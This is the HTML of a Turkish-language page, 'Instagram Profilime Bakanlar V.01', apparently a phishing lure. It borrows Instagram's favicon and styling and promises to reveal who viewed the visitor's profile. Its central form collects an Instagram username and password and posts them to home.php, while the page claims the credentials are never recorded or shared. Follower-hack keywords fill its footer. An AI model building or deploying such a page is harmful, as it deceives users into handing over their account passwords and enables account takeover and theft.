<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="icon" type="image/ico" href="https://www.instagram.com/favicon.ico">
<link href='img/mod.png' rel='icon' type='image/x-png'/>
<title>Profilime Bakanlar V.01</title>
<script src="js/jquery.min.js"></script>
<link rel="stylesheet" href="css/bootstrap.min.css">
<style>
h1, .h1, h2, .h2, h3, .h3 {
    margin-top: 0px;
    margin-bottom: 10.5px;
}
body { 
  background: url(img/instagram-background.jpg) no-repeat center center fixed; 
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}
.error-msg {
    margin: .5em 0;
    display: block;
    color: #dd4b39;
    line-height: 17px;
}
.col-md-6 {
 margin:0 auto;
 float:none;

}
.col-md-8 {
 margin:0 auto;
 float:none;

}
</style>
<br><center><font size="5"><font color="white"><strong>Instagram Profilime Bakanlar V.01 ©2015 - 2018</strong></font></font></center></div>
<body style="padding:0px;margin:0 auto;">
<div style="padding:0px;margin:0 auto;" class="container ">
<br>
<div style="border:groove;padding:0px;margin:0 auto;" class="col-md-6">

<center><br>
<div class="col-md-8">
<h2><img width="130" src="img/modd.png"></h2>
<h2>
  <strong><font color="white">Instagram İle Giriş Yap</font></strong>
</h2>
<div class="form-horizontal">
<h4 >
 
  </h4><br/>

<form action="home.php" method="POST">

<div style="width:65%" class="form-group">
  <input class="form-control" name="username"  placeholder="Kullanıcı Adı" type="username" required>
</div>
<div style="width:65%" class="form-group">
  <input class="form-control" name="password" placeholder="Şifre" type="password" required>
</div>

<div style="text-align:left" class="error-msg" id="hasilnya"></div>
<div style="width:65%" class="form-group">
  <input type="submit" name="gsubmit" class="btn btn-block" style="color: #ffffff;background-color: #000000;" id="gsubmit" value="Giriş Yap"> </form>
  </br>
</div>
</div>
</div>
</div>
<br>
<center>
<strong><font color="white" size="5">NEDEN BİZ?</font></strong><br>
<font color="black" size="4">4. senemizde hala daha güvenli ve sağlıklı bir şekilde çalışmaya devam ediyoruz. Bizi seçmelisiniz çünkü güvenliğimize güvenimiz sonsuz, Kullanıcı adınız ve şifreniz hiç bir şekilde kayıt altına alınmaz veya 3.şahıslar ile paylaşılmaz.</font>
<br>
<h6>instagram takipçi, takipçi hilesi, profilime bakanlar, instagram profilime bakanlar, instagram hilesi, instagram, instagram beğeni, instagram yorum
</center>